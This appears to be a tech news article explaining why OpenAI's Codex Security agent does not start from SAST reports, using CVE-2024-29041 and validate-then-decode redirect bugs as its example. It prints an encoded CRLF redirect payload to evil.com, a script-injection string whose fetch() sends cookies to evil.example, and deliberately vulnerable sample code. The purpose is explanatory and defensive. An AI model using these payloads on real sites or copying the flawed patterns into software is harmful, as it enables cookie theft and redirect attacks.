OpenAI built a vulnerability detection agent. It won't start with a SAST report.
Codex Security, which launched March 6 as a dedicated scanning agent, deliberately excluded static application security testing (SAST) as a starting point. The decision is documented in a blog post published in late March 2026, and it is the most substantive technical explanation of the tradeoff that a major AI lab has published.
The transformation chain problem
SAST tools trace dataflow: find where untrusted input enters, follow it through the program, flag where it reaches a sensitive sink without sanitization. It is a clean model. It catches real bugs.
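That dataflow model can be sketched as a toy taint tracker. The source, sanitizer, and sink names below are hypothetical stand-ins for a real tool's catalogs, and statements are simplified (lhs, function, args) triples; a real engine works over an intermediate representation with path and alias analysis:

```python
# Toy taint tracker illustrating the SAST dataflow model described above.
TAINTED_SOURCES = {"request.args"}   # where untrusted input enters
SANITIZERS = {"escape"}              # what clears taint
SINKS = {"render"}                   # sensitive operations

def analyze(statements):
    tainted, findings = set(), []
    for lhs, func, args in statements:
        if func in TAINTED_SOURCES:
            tainted.add(lhs)                     # untrusted input enters
        elif func in SANITIZERS:
            tainted.discard(lhs)                 # a sanitizer clears taint
        elif any(a in tainted for a in args):
            tainted.add(lhs)                     # taint propagates
        if func in SINKS and any(a in tainted for a in args):
            findings.append((func, args))        # tainted value hits a sink
    return findings

program = [
    ("x", "request.args", ()),   # x = request.args  -> tainted
    ("y", "concat", ("x",)),     # y derived from x  -> tainted
    ("_", "render", ("y",)),     # tainted value reaches the sink
]
findings = analyze(program)      # one finding: render(y)
```

The clean part of the model is visible even at this scale: taint in, taint out, sanitizer clears. The trouble, as the next section shows, is that "sanitizer clears" is an assumption, not a proof.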
OpenAI's post argues that the vulnerabilities defenders care most about are not dataflow problems. They look like this: code receives a redirect URL, validates it against an allowlist regex, URL-decodes it, then passes it to a redirect handler. A SAST tool sees the flow and flags nothing wrong. The check ran.
The actual vulnerability is that the regex validation happens before decoding. An attacker submits https://target.com%0d%0aLocation:%20https://evil.com, where target.com is the allowlisted host. The allowlist sees a benign URL. The decoder produces a newline-injected redirect to evil.com. The handler follows it. The dataflow is trivially traceable. The bug exists because the invariant "this check constrains the value" breaks after the transformation chain.
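The broken ordering fits in a few lines. This is a sketch of the pattern, assuming a hypothetical allowlist of trusted.example.com, not code from any real project:

```python
import re
from urllib.parse import unquote

# Hypothetical allowlist: only the trusted host may be a redirect target.
ALLOWED = re.compile(r"^https://trusted\.example\.com(/|$)")

def redirect_target(url):
    # Step 1: validate against the allowlist regex -- on the ENCODED form.
    if not ALLOWED.match(url):
        raise ValueError("disallowed redirect")
    # Step 2: decode AFTER validating -- this is where the invariant breaks.
    return unquote(url)

# An encoded CRLF survives validation, then reappears after decoding.
payload = "https://trusted.example.com/%0d%0aLocation:%20https://evil.com"
decoded = redirect_target(payload)
# decoded now contains a literal \r\n the allowlist never inspected
```

Reversing the two steps, decode first and validate the decoded value, closes the hole; the code as written passes every dataflow check while doing the opposite.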
CVE-2024-29041, recorded in the National Vulnerability Database, is a real instance of this pattern in Express.js. URL-encoded newlines in Location headers could bypass common allowlist implementations because interpretation happened after normalization, not before. Snyk and the GitHub Advisory Database both record the same pattern.
This is not exotic. OpenAI's argument is that most of the vulnerabilities that matter have this structure: validation logic that appears to guarantee a property but loses that guarantee through the transformations that follow it.
Why SAST cannot close the gap
SAST has to make approximations to stay tractable. It reasons about code without executing it, which means it cannot definitively answer whether a sanitization function is sufficient for a specific rendering context, encoding behavior, or downstream transformation. It sees that a sanitizer ran. It cannot determine whether the right sanitizer ran for the right interpretation.
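One way to see that limit concretely: a sanitizer that is correct for HTML text content does nothing for a JavaScript string context. The snippet below is a hypothetical illustration, not output from any real tool:

```python
import html

def sanitize(value):
    # Escapes <, >, and & -- sufficient for HTML *text* content.
    return html.escape(value, quote=False)

user = "');fetch('//evil.example/'+document.cookie);//"
safe_for_html = sanitize(user)

# Interpolated into a <script> string literal, the escaping is irrelevant:
# quotes, parentheses, and semicolons all pass through untouched.
page = "<script>var q = '" + safe_for_html + "';</script>"
# Static analysis sees that sanitize() ran; it cannot see that it ran
# for the wrong interpretation of the output.
```

Both facts, "a sanitizer ran" and "the output is injectable," are true simultaneously, and only the first is visible without reasoning about the rendering context.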
That is not a knock on the technology. It is the structural limit of the approach.
OpenAI's position is that feeding pre-computed SAST findings into an agent reasoning loop creates three predictable failure modes. The findings list becomes a map of where the tool already looked, biasing the agent toward those regions. The SAST report embeds implicit judgments about sanitization sufficiency that the agent inherits without re-examining. And the reasoning system becomes harder to evaluate, because the agent is confirming or dismissing findings rather than discovering them independently.
What Codex Security does instead
The architecture starts with the repository itself: its trust boundaries, intended behavior, and threat model. When the system encounters what looks like validation or sanitization, it does not treat it as resolved. It tries to falsify the guarantee.
The methods are concrete. The agent reads code paths with full repository context and does not let comments substitute for what the code actually does. It reduces complex chains to minimal testable slices and writes micro-fuzzers targeting those slices specifically. Where appropriate, it formalizes constraint problems as satisfiability queries and solves them with Z3, an SMT solver. And when execution is feasible, it runs end-to-end proofs of concept in sandboxed environments.
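The slice-then-fuzz step can be sketched against the validate-then-decode redirect pattern described earlier. Everything here, the allowlist, the token pool, the slice itself, is hypothetical; a real harness would be generated per codebase:

```python
import random
import re
from urllib.parse import unquote

ALLOWED = re.compile(r"^https://trusted\.example\.com(/|$)")

def check_then_decode(url):
    """Minimal testable slice of the redirect path: validate, then decode."""
    if not ALLOWED.match(url):
        raise ValueError("disallowed redirect")
    return unquote(url)

def micro_fuzz(rounds=2000, seed=0):
    """Search for an input that passes validation yet decodes to a CRLF."""
    rng = random.Random(seed)
    tokens = ["a", "%20", "%0d", "%0a", "%2e", "Location:", "//evil.example"]
    for _ in range(rounds):
        suffix = "".join(rng.choice(tokens) for _ in range(rng.randint(1, 6)))
        candidate = "https://trusted.example.com/" + suffix
        try:
            decoded = check_then_decode(candidate)
        except ValueError:
            continue
        if "\r" in decoded or "\n" in decoded:
            return candidate  # a falsifying witness: the invariant is broken
    return None

witness = micro_fuzz()  # quickly finds an encoded-CRLF bypass
```

The fuzzer is not trying to prove the check correct; it is trying to produce one concrete input that breaks the guarantee. A single witness is stronger evidence than any amount of pattern matching over the source.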
The shift is from "a check exists" to "the invariant holds, and here is the evidence."
The industry angle
OpenAI is not the first to argue that SAST has structural limits. The security community has debated dataflow versus semantic analysis for years. But a major lab publishing a detailed technical post explaining why its agentic security product deliberately excludes SAST as a starting point is a different kind of signal.
It means the product is built around a bet: that the vulnerability class defenders are actually missing is not the one SAST finds most efficiently. It means the agent needs to approach each codebase without the prior bias that a findings list introduces. And it means evaluation of the system has to be based on what the agent discovers independently, not what it confirms from pre-existing reports.
Whether that bet is right is an empirical question. The post is notable because it is the kind of technical honesty that rarely comes from a product launch.
The CVE
CVE-2024-29041 affected Express.js versions prior to 4.19.2. The dataflow is straightforward, the transformation-order mistake is visible in retrospect, and the fix is well documented. It is the ideal case for demonstrating why "the check exists" and "the system is safe" are not the same claim.